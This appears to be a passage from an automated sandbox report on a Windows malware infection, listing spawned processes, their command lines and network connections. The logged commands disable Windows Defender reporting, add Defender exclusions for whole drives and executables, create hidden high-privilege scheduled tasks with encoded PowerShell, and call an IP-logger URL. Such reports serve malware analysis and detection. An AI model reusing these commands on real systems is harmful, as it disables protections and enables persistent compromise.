PID 4508 wrote to memory of 5004 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe
PID 4508 wrote to memory of 5112 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\siww1049.exe
PID 4508 wrote to memory of 5112 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\siww1049.exe
PID 4508 wrote to memory of 3028 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\note6060.exe
PID 4508 wrote to memory of 3028 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\note6060.exe
PID 4508 wrote to memory of 3028 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\note6060.exe
PID 4508 wrote to memory of 2640 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\1.exe
PID 4508 wrote to memory of 2640 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\1.exe
PID 5004 wrote to memory of 4580 N/A C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe
PID 5004 wrote to memory of 4580 N/A C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe
PID 5004 wrote to memory of 4580 N/A C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Service.exe

"C:\Users\Admin\AppData\Local\Temp\Service.exe"

C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe

"C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST

C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe

"C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe"

C:\Users\Admin\Pictures\Adobe Films\8AyDk7NAPV0v24oDY1Q7VVXZ.exe

"C:\Users\Admin\Pictures\Adobe Films\8AyDk7NAPV0v24oDY1Q7VVXZ.exe"

C:\Users\Admin\Pictures\Adobe Films\dOaBjSg8mYjqYth2dayxRNWl.exe

"C:\Users\Admin\Pictures\Adobe Films\dOaBjSg8mYjqYth2dayxRNWl.exe"

C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe

"C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe"

C:\Users\Admin\Pictures\Adobe Films\cZSRSHgTd8DlJEacM46ocVuM.exe

"C:\Users\Admin\Pictures\Adobe Films\cZSRSHgTd8DlJEacM46ocVuM.exe"

C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe

"C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe" -h

C:\Users\Admin\Pictures\Adobe Films\SUsOP56v2IWwb71Bz51Cg1sx.exe

"C:\Users\Admin\Pictures\Adobe Films\SUsOP56v2IWwb71Bz51Cg1sx.exe"

C:\Users\Admin\AppData\Local\Temp\7zSF25C.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\is-N4MTP.tmp\SUsOP56v2IWwb71Bz51Cg1sx.tmp

"C:\Users\Admin\AppData\Local\Temp\is-N4MTP.tmp\SUsOP56v2IWwb71Bz51Cg1sx.tmp" /SL5="$70118,140006,56320,C:\Users\Admin\Pictures\Adobe Films\SUsOP56v2IWwb71Bz51Cg1sx.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2032 -ip 2032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 624

C:\Users\Admin\Pictures\Adobe Films\tLNVEw8h3F1AhYGAczL871CL.exe

"C:\Users\Admin\Pictures\Adobe Films\tLNVEw8h3F1AhYGAczL871CL.exe"

C:\Users\Admin\AppData\Local\Temp\is-IQ2D1.tmp\5(6665____.exe

"C:\Users\Admin\AppData\Local\Temp\is-IQ2D1.tmp\5(6665____.exe" /S /UID=91

C:\Windows\system32\fondue.exe

"C:\Windows\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll

C:\Users\Admin\AppData\Local\Temp\7zSFBC2.tmp\Install.exe

.\Install.exe /S /site_id "525403"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2032 -ip 2032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 644

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global

C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr98262.exe

"C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr98262.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2032 -ip 2032

C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe

"C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4900 -ip 4900

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 652

C:\Users\Admin\AppData\Local\Temp\siww1049.exe

"C:\Users\Admin\AppData\Local\Temp\siww1049.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4900 -s 600

C:\Users\Admin\AppData\Local\Temp\note6060.exe

"C:\Users\Admin\AppData\Local\Temp\note6060.exe"

C:\Users\Admin\AppData\Local\Temp\1.exe

"C:\Users\Admin\AppData\Local\Temp\1.exe"

C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe

"C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe" -h

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2032 -ip 2032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 588

C:\Users\Admin\AppData\Local\Temp\tvstream22.exe

"C:\Users\Admin\AppData\Local\Temp\tvstream22.exe"

C:\Users\Admin\AppData\Local\Temp\is-8865F.tmp\setup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-8865F.tmp\setup.tmp" /SL5="$601DE,870458,780800,C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\inst200.exe

"C:\Users\Admin\AppData\Local\Temp\inst200.exe"

C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe

"C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 520 -p 5112 -ip 5112

C:\Users\Public\SteamKeyGen.exe

"C:\Users\Public\SteamKeyGen.exe"

C:\Users\Admin\AppData\Local\Temp\udontsay.exe

"C:\Users\Admin\AppData\Local\Temp\udontsay.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2032 -ip 2032

C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe

"C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe"

C:\Users\Admin\AppData\Local\Temp\anytime1.exe

"C:\Users\Admin\AppData\Local\Temp\anytime1.exe"

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global

C:\Users\Admin\AppData\Local\Temp\AB6EH.exe

"C:\Users\Admin\AppData\Local\Temp\AB6EH.exe"

C:\Users\Admin\AppData\Local\Temp\anytime3.exe

"C:\Users\Admin\AppData\Local\Temp\anytime3.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2516 -ip 2516

C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe

"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"

C:\Users\Admin\AppData\Local\Temp\9KBMC.exe

"C:\Users\Admin\AppData\Local\Temp\9KBMC.exe"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Users\Admin\AppData\Local\Temp\9KBMC67FIDAHIDD.exe

https://iplogger.org/1nXhi7

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Users\Admin\AppData\Local\Temp\anytime2.exe

"C:\Users\Admin\AppData\Local\Temp\anytime2.exe"

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global

C:\Users\Admin\AppData\Local\Temp\L3MMH.exe

"C:\Users\Admin\AppData\Local\Temp\L3MMH.exe"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Users\Admin\AppData\Local\Temp\9KGGD.exe

"C:\Users\Admin\AppData\Local\Temp\9KGGD.exe"

C:\Users\Admin\AppData\Local\Temp\is-SGREN.tmp\setup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-SGREN.tmp\setup.tmp" /SL5="$701BC,870458,780800,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gWVLwaCWd" /SC once /ST 03:32:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2516 -s 604

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2032 -ip 2032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 884

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 5112 -s 708

C:\Users\Public\SteamKeyNeg.exe

"C:\Users\Public\SteamKeyNeg.exe"

C:\Users\Admin\AppData\Local\Temp\6AHD0.exe

"C:\Users\Admin\AppData\Local\Temp\6AHD0.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 1264

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gWVLwaCWd"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe

"C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe"

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Users\Admin\AppData\Local\Temp\lEDcrpdl2pCEl\Application407.exe

C:\Users\Admin\AppData\Local\Temp\lEDcrpdl2pCEl\Application407.exe

C:\Users\Admin\AppData\Local\Temp\is-V54MM.tmp\nthostwins.exe

"C:\Users\Admin\AppData\Local\Temp\is-V54MM.tmp\nthostwins.exe" 81

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDA4B.tmp.bat""

C:\Windows\SysWOW64\control.exe

"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\ZS~h.CPL",

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\ZS~h.CPL",

C:\Windows\system32\rundll32.exe

C:\Windows\system32\rundll32.exe C:\Windows\system32\PcaSvc.dll,PcaPatchSdbTask

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Windows\system32\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d "C:\ProgramData\Protection Controller v6.0.5"

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 536 -p 4976 -ip 4976

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 4976 -s 2072

C:\Users\Admin\AppData\Local\Temp\Chrome6.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Users\Admin\AppData\Local\Temp\temp-working.exe

"C:\Users\Admin\AppData\Local\Temp\temp-working.exe"

C:\Users\Admin\AppData\Local\Temp\Chrome6.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Users\Admin\AppData\Local\Temp\Chrome6.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe

"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"

C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe

"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"

C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe

"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gWVLwaCWd"

C:\Windows\system32\timeout.exe

timeout 4

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bYhnlZZiGBwVWbxfjL" /SC once /ST 06:16:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\NgGwqggyBEjLeKfaL\wxUWNCCtxxWMNyL\yjOthBP.exe\" ZF /site_id 525403 /S" /V1 /F

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 472 -p 3140 -ip 3140

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 3140 -s 2232

C:\ProgramData\Protection Controller v6.0.5\3e8f3f1f.exe

"C:\ProgramData\Protection Controller v6.0.5\3e8f3f1f.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 480 -p 2212 -ip 2212

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2212 -s 2236

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 560 -p 1972 -ip 1972

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 1972 -s 2240

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 472 -p 5588 -ip 5588

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 5588 -s 2284

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe

"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" "--oVWJq23b"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Routes\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Routes\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Routes\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Routes\User Data" --annotation=plat=Win64 --annotation=prod=Routes --annotation=ver=0.0.13 --initial-client-data=0x26c,0x270,0x274,0x248,0x278,0x7ffc779fdec0,0x7ffc779fded0,0x7ffc779fdee0

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Routes\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Routes\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Routes --annotation=ver=0.0.13 --initial-client-data=0x144,0x148,0x14c,0x120,0x150,0x7ff6a19c9e70,0x7ff6a19c9e80,0x7ff6a19c9e90

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe

"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1652,15480708616398607635,4250913911406448746,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_1151382142" --mojo-platform-channel-handle=1864 /prefetch:8

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe

"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=gpu-process --field-trial-handle=1652,15480708616398607635,4250913911406448746,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_1151382142" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1660 /prefetch:2

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe

"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1652,15480708616398607635,4250913911406448746,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_1151382142" --mojo-platform-channel-handle=2192 /prefetch:8

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe

"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Routes\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1652,15480708616398607635,4250913911406448746,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_1151382142" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2616 /prefetch:1

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe

"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Routes\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1652,15480708616398607635,4250913911406448746,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_1151382142" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2564 /prefetch:1

C:\Windows\system32\RunDll32.exe

C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\ZS~h.CPL",

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\ZS~h.CPL",

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe

"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=gpu-process --field-trial-handle=1652,15480708616398607635,4250913911406448746,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_1151382142" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3196 /prefetch:2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Windows\system32\services64.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Windows\system32\services64.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Windows\system32\services64.exe"

C:\Windows\system32\services64.exe

C:\Windows\system32\services64.exe

C:\Windows\system32\services64.exe

C:\Windows\system32\services64.exe

C:\Windows\system32\services64.exe

C:\Windows\system32\services64.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 licensing.mp.microsoft.com udp
US 20.223.25.224:443 licensing.mp.microsoft.com tcp
US 8.8.8.8:53 storesdk.dsx.mp.microsoft.com udp
FR 2.18.109.224:443 storesdk.dsx.mp.microsoft.com tcp
US 8.8.8.8:53 telegram.org udp
NL 149.154.167.99:443 telegram.org tcp
US 20.223.25.224:443 licensing.mp.microsoft.com tcp
NL 212.193.30.45:80 212.193.30.45 tcp
NL 212.193.30.21:80 212.193.30.21 tcp
US 20.223.25.224:443 licensing.mp.microsoft.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 20.223.25.224:443 licensing.mp.microsoft.com tcp
NL 45.144.225.57:80 45.144.225.57 tcp
NL 212.193.30.45:80 212.193.30.45 tcp
NL 212.193.30.21:80 212.193.30.21 tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.133.233:80 cdn.discordapp.com tcp
US 162.159.133.233:80 cdn.discordapp.com tcp
US 162.159.133.233:80 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 34.117.59.81:443 ipinfo.io tcp
NL 45.144.225.57:80 45.144.225.57 tcp
NL 212.193.30.21:80 212.193.30.21 tcp
US 162.159.133.233:80 cdn.discordapp.com tcp
US 162.159.133.233:80 cdn.discordapp.com tcp
US 8.8.8.8:53 buck-bucket.s3.pl-waw.scw.cloud udp
